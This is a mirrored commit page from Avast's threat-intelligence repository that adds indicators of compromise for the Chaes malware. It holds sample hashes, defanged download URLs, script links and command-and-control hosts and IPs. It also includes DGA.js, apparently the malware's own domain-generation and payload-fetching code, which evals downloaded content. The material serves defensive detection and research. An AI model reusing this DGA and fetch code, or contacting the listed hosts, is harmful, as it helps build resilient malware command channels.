Mirrors
/
ioc-collection
mirror of https://github.com/avast/ioc
6
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #37 from anhqpho/master 

IOCs for Chaes
This commit is contained in:
avast-ti 2022-01-20 20:45:56 +01:00 committed by GitHub
parent 866867df7f 5b5899269e
commit b324a596f6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
6 changed files with 418 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

107
Chaes/README.md Normal file
View File

@ -0,0 +1,107 @@
# IoC for Chaes
Malware analysis and more technical information at <https://decoded.avast.io/anhho/chasing-chaes-kill-chain/>
### Table of Contents
* [SHA-256](#sha-256)
* [Network indicators](#network-indicators)
## SHA-256
```
f20d0ffd1164026e1be61d19459e7b17ff420676d4c8083dd41ba5d04b97a08c
069b11b9b1b20828cfb575065a3d7e0b6d00cd1af10c85c5d6c36caea5e000b7
1836f3fa3172f4c5dbb15adad7736573b4c77976049259cb919e3f0bc7c4d5ea
02831471e4bf9ef18c46ed4129d658c8ce5b16a97f28228ab78341b31dbef3df
62053aeb3fc73ef0940e4e30056f6c42b737027a7c5677f9dbafc5c4de3590bd
a3bcbf9ea2466f422481deb6cb1d5f69d00a026f9f94d6997dd9a17a4190e3aa
e56a321cae9b36179e0da52678d95be3d5c7bde2a7863e855e331aea991d51b9
7a819b168ce1694395a33f60a26e3b799f3788a06b816cc3ebc5c9d80c70326b
70135c02a4d772015c2fce185772356502e4deab5689e45b95711fe1b8b534ce
6e6a44ca955d013ff01929e0fa94f956b7e3bac557babcd7324f3062491755e2
0b5646f45f0fad3737f231f8c50f4ed1a113eb533997987219f7eea25f69d93f
abc071831551af554149342ad266cc43569635fb9ea47c0f632caa5271cdf32f
bd4f39daf16ca4fc602e9d8d9580cbc0bb617daa26c8106bff306d3773ba1b74
c22b3e788166090c363637df94478176e741d9fa4667cb2a448599f4b7f03c7c
426327abdafc0769046bd7e359479a25b3c8037de74d75f6f126a80bfb3adf18
3311b0b667cd20d4f546c1cb78f347c9c56d9d064bb95c3392958c79c0424428
c9b3552665911634489af5e3cb1a9c0c3ab5aed2b73c55ae53b8731a1de23a9f
fa752817a1b1b56a848c4a1ea06b6ab194b76f2e0b65e7fb5b67946a0af3fb5b
e644268503cf1eaf62837ec52a91b8bec60b0c8ee1fb7e42597d6c852f8b8e9d
bd5d2a0ec30fa454af1a086b4c648039422eca4fa1b1d6e8ecc4d47be7fab27f
4d2ffae69b4e0f1e8ba46b79811d7f46f04bd8482568eccf5620e6b1129c1633
faad384e124c283a8d024ee69dceaac877be52f5adbf18ca6b475a66663b0e85
969fa30802bdb81be5b57fef073896c2ee3df4211663301548f8efa86257e0cf
5a1ebf757ab9aa796a8580daafab9635660b9cc55505db194cbfefeb612e48f0
2d9e040820acca9a0fab2dc68546e0a824c4c45ee8c62332213e47e1f6923c90
32c545e133183e6fc999e8f6a0da3c6e7fb1a12b97d2a3bbc5e84faa175a9ef6
e1d9effa8a56d23dbcefd2146eb5c174a245b35a4f718473452135bd064a2157
ba3e0314b1d6e6ee10c473c1bbd883c4a5c53b5703b5ced174cd5a30b0b87160
e210217f2b5912e16a281dcbd5a5247fe2a62897dc5c2e1bf4ff61d3a07405f0
7a1d74c4d62ceee45a3cbaf79070cfc01342a05f47e0efb401c53040897bed77
550188ad28ccc07791880777c2de07e6d824a7263b9e8054423597b160e594a3
9603c4ce0f5a542945ed3ced89dd943eb865368b4e263090be9e0d9c1785615d
9dbbff69e4e198aaee2a0881b779314cdd097f63f4baa0081103358a397252a1
6dc63ea4dbe5d710b7ba161877bd0a3964d176257cdfb0205c1f19d1853cc43b
3e48f714e793b3111ce5072e325af8130b90a326eca50641b3b2d2eba7ac0a45
0762038fe591fef3235053c7136f722820de6d8457cae09d4aa9bf6cb7f497a1
754eeb010795c86d1cc47b0813da6bbc6d9153f1dd22da8af694a9e2dca51cda
ea177d6a5200a39e58cd531e3effb23755604757c3275dfccd9e9b00bfe3e129
7c275daab005bb57e8e97ac98b0ae145a6e850370e98df766da924d3af609285
96224c065027bb72f5e2caebf4167482fe25fb91c55f995e1c86e1c9884815c3
2688a7ac5b408911ae3e473278ecbc7637491df2f71f6f681bc3ed33045b9124
f3c1fd9e8674901771c5bfc4ce16eba75beff7df895a4dc6fdd33bedb2967a08
ddecc2606be56beae331000ba091e5e77ae11380f46eba45387c65289e6ce421
debe443266ab33acb34119f515f4622464edff198f77fd20006e2d79aafb6dfc
bf4a83a19065d5c45858ceb988dce39d93c412902ead6434e85fbf2caa17db44
87502ad879a658aa463088c50facfbdbb1c6592263e933b8b99e77293fdf1384
6b6abc64053d20306147efced9df2ef75153e87a1d77ce657943b2373fb4ffb9
679a02d0ae4f5382767eb11cefad59c0664f55ed2ce3e3b3df97b78c09e18aa3
564b31c3d609d96a73ee139ec53453b985673ffacacb56ecd13d2c83bbf851e0
e649f71b68cc54f3d985e398f1c6354963ec027a26230c4c30b642d2fd5af0a6
3fd48530ef017b666f01907bf94ec57a5ebbf2e2e0ba69e2eede2a83aafef984
5da6133106947ac6bdc1061192fae304123aa7f9276a708e83556fc5f0619aab
```
## Network indicators
#### Download URLs
```
dragaobrasileiro[.]com.br/wp-content/themes/getcorsfile.php?
chopeecia[.]com.br/D4d0EMeUm7/index.php?install
bodnershapiro[.]com/blog/wp-content/themes/twentyten/p.php?
dmt-sys[.]net/index.php?
up-dmt[.]net/index.php?
sys-dmt[.]net/index.php?
x-demeter[.]com/index.php?
walmirlima[.]com.br/wp-content/themes/epico/proxy.php?
atlas[.]med.br/wp-content/themes/twentysixteen/proxy.php?
apoiodesign[.]com/language/overrides/p.php?
```
#### HTML Scripts
```
is[.]gd/EnjN1x?V=31
is[.]gd/oYk9ielu?D=30
is[.]gd/Lg5g13?V=29
tiny[.]one/96czm3nk?v=28
is[.]gd/WRxGba?V=27
is[.]gd/3d5eWS?V=26
```
#### CnC Servers
```
200[.]234.195.91
f84f305c[.]com
bkwot3kuf[.]com
comercialss[.]com
awsvirtual[.]blogspot.com
cliq-no[.]link
108[.]166.219.43
176[.]123.8.149
176[.]123.3.100
198[.]23.153.130
191[.]252.110.241
191[.]252.110.75
```

135
Chaes/extras/DGA.js Normal file
View File

@ -0,0 +1,135 @@
function getDWCode() {
var arrDoH = [
"https://doh.dns.sb/dns-query",
"https://doh1.blahdns.com/uncensor",
"https://dns.rubyfish.cn/dns-query"
];
var domainList = [
".ddns.net", ".ddnsking.com", ".3utilities.com", ".bounceme.net", ".freedynamicdns.net", ".freedynamicdns.org", ".gotdns.ch", ".hopto.org", ".myddns.me", ".myftp.biz", ".myftp.org", ".myvnc.com", ".onthewifi.com", ".redirectme.net", ".servebeer.com", ".serveblog.net", ".servecounterstrike.com", ".serveftp.com", ".servegame.com", ".servehalflife.com", ".servehttp.com", ".serveirc.com", ".serveminecraft.net", ".servemp3.com", ".servepics.com", ".servequake.com", ".sytes.net", ".viewdns.net", ".webhop.me", ".zapto.org", ".xyz", ".space", ".online", ".icu", ".cyou", ".site", ".top", ".website", ".work", ".monster", ".io", ".so"
];
var ip;
var domain = GetDomainHashByWeek(DateTime.Now);
for (var i = 0; i < arrDoH.length; i++) {
ip = resolveDoH(arrDoH[i], "google.com");
if (!ip) continue;
log("DoH test passed google.com resolved to: " + ip);
for (var c = 0; c < domainList.length; c++) {
log(
"Resolving " + domain + domainList[c] + " on " + arrDoH[i] +
"..."
);
ip = resolveDoH(arrDoH[i], domain + domainList[c]);
if (!ip) continue;
log(
"IP resolved for " + domain + domainList[c] + " on " +
arrDoH[i] + ": " + ip
);
var signedCode = getCodeFromDW(ip);
if (signedCode) return signedCode;
}
}
// if it got here is because it could not resolve yet
for (var c = 0; c < domainList.length; c++) {
log("Resolving " + domain + domainList[c] + "...");
ip = resolveDNS(domain + domainList[c]);
if (!ip) continue;
log("IP resolved for " + domain + domainList[c] + ": " + ip);
var signedCode = getCodeFromDW(ip);
if (signedCode) return signedCode;
}
return false;
}
function resolveDoH(query, domain) {
try {
var json = (new WebClient()).DownloadString(
query + "?name=" + domain + "&type=A"
);
json = "json = " + json;
eval(eval("json", "unsafe"), "unsafe");
if (!json) return false;
if (!json.Answer) return false;
if (!json.Answer[0]) return false;
if (!json.Answer[0].data) return false;
return json.Answer[0].data.Trim(".");
} catch (error) {
log("Error resolveDoH(): " + error);
}
}
function GetDomainHashByWeek(dt) {
var wordList1 = [
"update", "system", "server", "game", "finan", "sistema", "esc", "servidor", "atualiza", "jogo", "internet", "servico", "service", "play", "comm", "hosting", "iphone", "samsung", "xiaomi", "motorola", "coin", "money", "fiat", "currency", "usa", "brasil", "deut", "espana", "tree", "apple", "adam", "eve", "lucifer", "satan", "demon", "angel", "break", "run", "playing", "stream", "cloud", "storage", "archive", "package", "upload", "submit", "send", "save", "counter", "strike", "steam", "discord", "left"
];
var wordList2 = [
"merc", "ven", "ear", "mar", "jup", "sat", "ura", "nep"
];
var n = GetWeek(dt);
var year = CultureInfo.InvariantCulture.Calendar.GetYear(dt);
var word1 = wordList1[n % wordList1.length];
var word2 = wordList2[n % wordList2.length];
return word1 + word2 + year;
}
function getCodeFromDW(ip) {
try {
var content = (new WebClient()).DownloadString(
"https://" + ip + "/dsa/login.html"
);
return getSignedCode(content);
} catch (error) {
log("Error getCodeFromDW(): " + error);
}
try {
var content = (new WebClient()).DownloadString(
"http://" + ip + "/dsa/login.html"
);
return getSignedCode(content);
} catch (error) {
log("Error getCodeFromDW(): " + error);
}
return false;
}
function resolveDNS(hostname) {
try {
var iph = Dns.Resolve(hostname);
if (iph) {
for (var i = 0; i < iph.AddressList.Length; i++) {
return String(iph.AddressList[i]);
}
}
} catch (error) {
log("Error resolveDNS(): " + error);
}
return false;
}

28
Chaes/network.txt Normal file
View File

@ -0,0 +1,28 @@
is[.]gd/EnjN1x?V=31
is[.]gd/oYk9ielu?D=30
is[.]gd/Lg5g13?V=29
tiny[.]one/96czm3nk?v=28
is[.]gd/WRxGba?V=27
is[.]gd/3d5eWS?V=26
dragaobrasileiro[.]com.br/wp-content/themes/getcorsfile.php?
chopeecia[.]com.br/D4d0EMeUm7/index.php?install
bodnershapiro[.]com/blog/wp-content/themes/twentyten/p.php?
dmt-sys[.]net/index.php?
up-dmt[.]net/index.php?
sys-dmt[.]net/index.php?
x-demeter[.]com/index.php?
walmirlima[.]com.br/wp-content/themes/epico/proxy.php?
atlas[.]med.br/wp-content/themes/twentysixteen/proxy.php?
apoiodesign[.]com/language/overrides/p.php?
200[.]234.195.91
f84f305c[.]com
bkwot3kuf[.]com
comercialss[.]com
awsvirtual[.]blogspot.com
cliq-no[.]link
108[.]166.219.43
176[.]123.8.149
176[.]123.3.100
198[.]23.153.130
191[.]252.110.241
191[.]252.110.75

48
Chaes/samples.md5 Normal file
View File

@ -0,0 +1,48 @@
28D47027197073FD60F3A17562F3AC21
4D1DE64E2919714BD7FC87DA785CBF36
65E90FFA1CC69E0584AC7FF106E7B183
6A2BB5B0502872B87B102E278AFC7546
53A4C0C9158EB2F741CB6455DE686C45
5F073300702D676333A3FB7DA803AB99
2517A433985031356ED06656FC5BC339
2A2D64B0FA6151C1E6D97630EC0911D7
AE9301D2EF4828FB5B810386E3C6EBBD
D87D451FD08DB5A34F98EA46E77977FC
E419EE26D534610FBB7497D891B481EB
F60394A870A1B7AF53DD7125653CE5B4
DBFB6EF2F3FFE72BDC753EB38CC4EC51
F3E029EDA15134DB44EABA64B726C6D8
144D71A9E08CA27A25DFCA4221554CDB
835DB7A25AC44581BCA66426C3FCBCA4
C4B2C64A5CFDD6B6E7FC582E1436F698
52FBB08DB1C3E6E8AC449773D6DE2CEE
C655D882D8E047D14789418C11004DF6
8B618947E38D1442496D6194C09F3FFB
CDC09552BB0F96EC225B4BB3BA8A1082
6FDF461A446B5F470B86B4F7E1C75C6B
AB300677F20AEAC382358EC38C19B0CF
F112268CFB1218B9E04D362F06BADABD
A0B82B24D22A5AF36DB8051D5F8302B4
13ACDB0B8CB543E10C2BA2496E912135
651083A9EEDD754FFBC54CC15EAF7A84
EFA19C9573A503BAD71B55DB29C83997
709D81DDC22C3279CE1A47556652DF42
F45FB72A08C75C7FCE67D3E72CC37A7E
D55D4BB717EBDFB4B01C358E75382915
6888BE5969051A933C3B7FB7CB9A32D0
D05ED486A719ACFA05BECDC54464DD53
BB80E55C83BA0240F3D549C1FBF419CA
EFBF2B99A6EA6A4969AE75CC572ACB2C
F3133B981FE27C7D5DF1EE2E68BEAEEB
77C90DF40071B8CDC4BA6FBB51118B30
9CC455D57B9E6F179A34DAF461212B00
35C969B69F15E4C26B392D8BB9C9AB8C
24B2B0D8F0C364C9B08C10ADACF15037
25425A954C588AD128873DE95F62B958
9EBAC7E16B6ABBDE38451B6C995A8BD5
39827874D407C42DFF6EB9899731E19E
8D2BBB7B26DF5CC10998544D6CD84B55
DA082FC9C5A38EC7F5479E2B57F72A3C
D92313E7477D5C5A2302C5FE9165876C
F5FE118AB987BA8BA78FC8F6AC77E1BE
8C35F37D2FF6DC3C8A67673D91040FDC

48
Chaes/samples.sha1 Normal file
View File

@ -0,0 +1,48 @@
182DA4971431EFD1D191B6EBE984CBAF67452EC8
BE6AE231D3DD7D61D46743C0F1A83B2294D0107A
930657FFB261975864036562853CA7CDDE731A50
F64580F5399354E694BA43AEAA838D554B331686
CC7E1D7B508CCC97714654EBC632A2A92B95CD81
9C87FFF604507E5C365A49D92453872C60CD1E9E
D6A68E090225517AEE2A37FB6C4089A5CA4965A6
1BCD3F1B625A9F288701E3404DB2810B5797E313
931DD6AAB250742A35C18C8A1A5BED32478590B7
1D7B8A809832B4722374DF0EA3AD76202C946EA6
6064CA08627B3E0E07FA585769643E89EC0EDA54
5D469F82CFDFA4D02931A9A498474EB8E244857E
6DA030007C9F2B42F04D1A8E557D57181E0CFDD3
585066A56F6C16548C7F9976B113456D9028B330
B41FE977A22F2525C89E25E9034D21FFDBC9687B
68AAB309F8A25ECB15D4B90C2560293E3A5E50F1
BDF5D760AFEF9B769A56F4612FC3475ED0EE4A54
1FDEF1CBC3D3B56FEA6F746E2118D5B61A732E58
34B01C6994515DEC5D03801137D6214C8375EFB1
E95D44FA462A7D7CD4BF10CCB51527DF00BE6904
0CBD06D9EEF8DCFB1744354A8A565B08E54426ED
68D47BBFA441B3C6EB03D9C9A23D92A626F40DC4
4CDECAB859EE3D252C050DF80117FDD589CE6218
B417BBC3CBC35401096485145EBD8CB4DB78B465
47F3298BBA73DAE95C69089C134FEFBE67C56EF3
7D1C88656A2B48186ADF4D45E08176F68A971CD9
2400863B05721605C9D12E59A34546BFE8331A83
A507F9280058D4C230885BF817BC83EB26595155
C9F07BE8E2EFA8E58073B83F4466EC682D40A032
5988A53F86D4AB8E2B63E8DD52ECA156F83E8D63
276D2EB81E31A2F0586A73FA2A42E4BD4F3F4D7B
ED6EFA503DEEEC4722622C1478B67BD2D4E28D91
0430D6850CE46B516E0A49BF5249E040B3E906F6
EEBE69C1962617E975AD0F4891D6F3B2A3B48E36
833B3BC2199862D688B72C9E239FAC1C0E4CA6B0
1B0CF33B3EC0DB22CC647BD670D85FBC16CC6401
95A3C05BC932563D6BDA5D4BABD7DE03B7C26B76
8DF393B0082ABC6CABDF04712E7CF175635063EE
D73662B1E7570481E9B2045A42B668A19ED6F216
5E67DE6749C110898ADB7B8797F58788DEBBB2EC
A350E1D2446B42BA32BB46876FCD899E3BBC01ED
BB2F8564E2645C83A4C76B26C0E4B4581EC36778
F2B380734B3FD1BABA0C4639A1CB32079E1D8982
8718E50EBB8689B9B712FC215F636BC17A59BCCF
789304AB84CC65789A6DEBDD55608FEC2386BC8B
8A765AA1CD900AA68270EBCF9E628FFDFD6EB3CE
EE54B570493471A96FA0C2EA213D3CF571CD6F82
D141BF1E647BC33C08DB7DEC1D83BA36B4E0E490

52
Chaes/samples.sha256 Normal file
View File

@ -0,0 +1,52 @@
F20D0FFD1164026E1BE61D19459E7B17FF420676D4C8083DD41BA5D04B97A08C
069B11B9B1B20828CFB575065A3D7E0B6D00CD1AF10C85C5D6C36CAEA5E000B7
1836F3FA3172F4C5DBB15ADAD7736573B4C77976049259CB919E3F0BC7C4D5EA
02831471E4BF9EF18C46ED4129D658C8CE5B16A97F28228AB78341B31DBEF3DF
62053AEB3FC73EF0940E4E30056F6C42B737027A7C5677F9DBAFC5C4DE3590BD
A3BCBF9EA2466F422481DEB6CB1D5F69D00A026F9F94D6997DD9A17A4190E3AA
E56A321CAE9B36179E0DA52678D95BE3D5C7BDE2A7863E855E331AEA991D51B9
7A819B168CE1694395A33F60A26E3B799F3788A06B816CC3EBC5C9D80C70326B
70135C02A4D772015C2FCE185772356502E4DEAB5689E45B95711FE1B8B534CE
6E6A44CA955D013FF01929E0FA94F956B7E3BAC557BABCD7324F3062491755E2
0B5646F45F0FAD3737F231F8C50F4ED1A113EB533997987219F7EEA25F69D93F
ABC071831551AF554149342AD266CC43569635FB9EA47C0F632CAA5271CDF32F
BD4F39DAF16CA4FC602E9D8D9580CBC0BB617DAA26C8106BFF306D3773BA1B74
C22B3E788166090C363637DF94478176E741D9FA4667CB2A448599F4B7F03C7C
426327ABDAFC0769046BD7E359479A25B3C8037DE74D75F6F126A80BFB3ADF18
3311B0B667CD20D4F546C1CB78F347C9C56D9D064BB95C3392958C79C0424428
C9B3552665911634489AF5E3CB1A9C0C3AB5AED2B73C55AE53B8731A1DE23A9F
FA752817A1B1B56A848C4A1EA06B6AB194B76F2E0B65E7FB5B67946A0AF3FB5B
E644268503CF1EAF62837EC52A91B8BEC60B0C8EE1FB7E42597D6C852F8B8E9D
BD5D2A0EC30FA454AF1A086B4C648039422ECA4FA1B1D6E8ECC4D47BE7FAB27F
4D2FFAE69B4E0F1E8BA46B79811D7F46F04BD8482568ECCF5620E6B1129C1633
FAAD384E124C283A8D024EE69DCEAAC877BE52F5ADBF18CA6B475A66663B0E85
969FA30802BDB81BE5B57FEF073896C2EE3DF4211663301548F8EFA86257E0CF
5A1EBF757AB9AA796A8580DAAFAB9635660B9CC55505DB194CBFEFEB612E48F0
2D9E040820ACCA9A0FAB2DC68546E0A824C4C45EE8C62332213E47E1F6923C90
32C545E133183E6FC999E8F6A0DA3C6E7FB1A12B97D2A3BBC5E84FAA175A9EF6
E1D9EFFA8A56D23DBCEFD2146EB5C174A245B35A4F718473452135BD064A2157
BA3E0314B1D6E6EE10C473C1BBD883C4A5C53B5703B5CED174CD5A30B0B87160
E210217F2B5912E16A281DCBD5A5247FE2A62897DC5C2E1BF4FF61D3A07405F0
7A1D74C4D62CEEE45A3CBAF79070CFC01342A05F47E0EFB401C53040897BED77
550188AD28CCC07791880777C2DE07E6D824A7263B9E8054423597B160E594A3
9603C4CE0F5A542945ED3CED89DD943EB865368B4E263090BE9E0D9C1785615D
9DBBFF69E4E198AAEE2A0881B779314CDD097F63F4BAA0081103358A397252A1
6DC63EA4DBE5D710B7BA161877BD0A3964D176257CDFB0205C1F19D1853CC43B
3E48F714E793B3111CE5072E325AF8130B90A326ECA50641B3B2D2EBA7AC0A45
0762038FE591FEF3235053C7136F722820DE6D8457CAE09D4AA9BF6CB7F497A1
754EEB010795C86D1CC47B0813DA6BBC6D9153F1DD22DA8AF694A9E2DCA51CDA
EA177D6A5200A39E58CD531E3EFFB23755604757C3275DFCCD9E9B00BFE3E129
7C275DAAB005BB57E8E97AC98B0AE145A6E850370E98DF766DA924D3AF609285
96224C065027BB72F5E2CAEBF4167482FE25FB91C55F995E1C86E1C9884815C3
2688A7AC5B408911AE3E473278ECBC7637491DF2F71F6F681BC3ED33045B9124
F3C1FD9E8674901771C5BFC4CE16EBA75BEFF7DF895A4DC6FDD33BEDB2967A08
DDECC2606BE56BEAE331000BA091E5E77AE11380F46EBA45387C65289E6CE421
DEBE443266AB33ACB34119F515F4622464EDFF198F77FD20006E2D79AAFB6DFC
BF4A83A19065D5C45858CEB988DCE39D93C412902EAD6434E85FBF2CAA17DB44
87502AD879A658AA463088C50FACFBDBB1C6592263E933B8B99E77293FDF1384
6B6ABC64053D20306147EFCED9DF2EF75153E87A1D77CE657943B2373FB4FFB9
679A02D0AE4F5382767EB11CEFAD59C0664F55ED2CE3E3B3DF97B78C09E18AA3
564B31C3D609D96A73EE139EC53453B985673FFACACB56ECD13D2C83BBF851E0
E649F71B68CC54F3D985E398F1C6354963EC027A26230C4C30B642D2FD5AF0A6
3FD48530EF017B666F01907BF94EC57A5EBBF2E2E0BA69E2EEDE2A83AAFEF984
5DA6133106947AC6BDC1061192FAE304123AA7F9276A708E83556FC5F0619AAB